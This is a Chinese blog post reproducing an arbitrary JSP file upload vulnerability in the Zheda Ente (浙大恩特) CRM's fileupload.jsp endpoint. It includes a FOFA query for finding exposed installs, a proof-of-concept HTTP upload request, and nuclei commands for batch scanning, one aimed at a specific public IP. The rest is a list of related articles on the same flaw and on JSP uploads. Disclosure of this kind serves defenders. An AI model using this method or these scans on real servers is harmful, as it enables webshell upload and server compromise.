浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

已于 2023-11-12 21:56:20 修改
阅读量435 收藏 1
点赞数
文章标签: 网络
于 2023-11-12 21:52:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CommputerMac/article/details/134366679
版权

一、漏洞描述

杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。

浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

二、网络空间搜索引擎搜索

fofa查询:

title="欢迎使用浙大恩特客户资源管理系统"

三、漏洞复现

POC

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=test.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=D03EA9F87BFF485E69DA876A220C69C9; lang=zh-cn
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

This website has a vulnerability!!!

四、批量检测

单个检测

./nuclei.exe -t ./enter.yaml -target http://27.152.69.148:81

批量检测

 .\nuclei.exe -t enter.yaml -l .\test_target.txt

关注微信公众号 网络安全透视镜 回复 20231113 获取Nuclei检测脚本

为赋新词强说愁
关注
【漏洞复现】浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
11-15 990
杭州恩软信息技术有限公司(简称浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。
浙大恩特客户资源管理系统fileupload.jsp,machord_doc.jsp接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
11-21 368
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。该系统fileupload.jsp,machord_doc.jsp等接口允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
FileUpload_jsp.rar
07-02
这个仿163网盘无刷新文件上传系统,并没有用使用控件,完全的手工制作。 本来觉得这个系统会很复杂,但把每个部分都分析清楚后,其实需要的技术并不高。不过当我把各个功能函数都整理好准备进行封装时,却发现要把程序封装不是那么容易,因为程序跟html的耦合度太高。然后我逐步把程序中操作html相关的部分分离出来,首先把简单的分离,接着是文件列表,然后是file控件,最后是一些提示性程序。经过几次尝试才把整个结构封装好。
手把手教Jsp上传文件(FileUpload+Servlet)
weixin_30266829的博客
12-22 120
本教程以Apache组织的commons项目中的FileUpload项目做为jsp文件上传组件,FileUpload项目完全尊守RFC1867规范中 关于在HTTP request 中通过Post方法提交文件的规范,该项目性能稳定快速,易于部署和使用. 本次教程以前端jsp + 后端 servlet的方式上传文件,你也可以完全在jsp中实现而不用servlet. 在开始之前你要准备以下几个东西:...
JspFileUpload控件的使用
Ben的专栏
04-10 1万+
许久没有登录自己的校内网了,今天登录了一下,忽然发现校内的上传照片挺有意思的,于是乎就从网上找了一下,校内应该是使用jsp写的。在网上找到了个FileUpload控件,可以很方便的上传文件。在网上找到一篇详细介绍这个控件使用的,试验了一下,搞了好久才实现现在整理出来。一、首先得下载三个jar包1. commons-FileUpload 1.2 包   下载地址:http://
fileupload jsp上传下载组件和使用方法
05-04
fileupload jsp上传下载组件和使用方法
浙大恩特客户资源管理系统任意文件上传漏洞复现
0xSec
11-10 1678
浙大恩特客户资源管理系统fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
浙大恩特客户资源管理系统CustomerAction.entphone;.js 接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
11-17 326
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。该系统CustomerAction.entphone;.js 接口允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
浙大恩特客户资源管理系统CrmBasicAction.entcrm接口存在任意文件上传漏洞
nnn2188185的博客
01-16 184
浙大恩特客户资源管理系统CrmBasicAction.entcrm接口存在任意文件上传漏洞
JSP FileUpload实现文件上传
makersy的博客
12-17 955
文件上传的条件 表单必须是post提交方式 表单中必须有文件上传项,文件上传项必须有name属性和值 表单的enctype属性必须设置为multipart/form-data 文件上传基本操作 数据接收:通过使用fileupload jar包的Commo-FileUpload组件完成文件上传 基本步骤: 创建一个 磁盘文件项工厂 的对象 DiskFileItemFactory diskFil...
fileupload控件的简单使用
太匆匆
09-28 3972
fileupload.jsp <%-- Created by IntelliJ IDEA. User: Limbo Date: 2016/9/27 Time: 23:23 To change this template use File | Settings | File Templates. --%> File Upload Fi
JSP Servlet学习笔记——使用fileupload上传文件
續寫經典
10-23 1万+
关键代码如下: index.jsp 文件上传 文件描述: 选择文件: 选择文件: 选择文件: 选择文件: 选择文件: FileUploadServlet.jsp package com.accp.fileupload.se
JSP文件上传
yu的博客
04-17 1739
JSP实现文件上传
JSP实现文件上传——uploadFile.jsp
穆雄雄的博客
11-21 874
<% String path = request.getContextPath(); String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; %> "> My JSP 'uploadFile.jsp' st
Jsp 使用 fileupload 文件上传和下载
热门推荐
野指针er
12-01 1万+
前言Jsp文件上传的目前主要有两个常用的: 1、SmartUpload 2、Apache Commons fileupload我在期末的 Jsp大作业 使用到文件上传模块,使用了第二个 Apache 的包,这里写下它的普通用法和注意的问题、最重要的是介绍表单的文本信息和文件一块提交的写法。解决第一步、我们应该引入2个包:commons-fileupload-1.2.1.jar commons-i
网络】深入理解 HTTPS:确保数据传输安全的核心协议
人生苦短,睡觉要紧,睡醒再说
11-06 1780
HTTPS(HyperText Transfer Protocol Secure)是 HTTP 协议的安全版本。HTTP 是用于客户端与服务器之间传输网页数据的协议,而 HTTPS 在 HTTP 协议的基础上添加了一层SSL/TLS加密协议,使得传输的数据在网络中不易被窃取或篡改。HTTPS 通常用于传输敏感信息,如登录凭证、支付信息、个人数据等。与 HTTP 协议不同,HTTPS 在数据传输过程中会对信息进行加密,确保数据在传输过程中不被第三方监听或修改。
字节序(Byte Order)
最新发布
weixin_50993868的博客
11-11 216
字节序与平台字节序转换字节序(Byte Order)是指数据在内存中存储时字节的排列顺序。由于不同的计算机体系结构可能采用不同的字节序,因此理解字节序非常重要,特别是在处理多平台数据传输或存储时。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 270
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
浙大恩特外贸客户管理系统操作指南
"浙大恩特外贸客户管理系统使用手册" 浙大恩特外贸客户管理系统是一款专为外贸企业设计的高效管理工具,旨在帮助企业管理客户信息、跟进进度、销售计划以及日常运营。本手册详细介绍了系统的安装、使用和各项功能的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值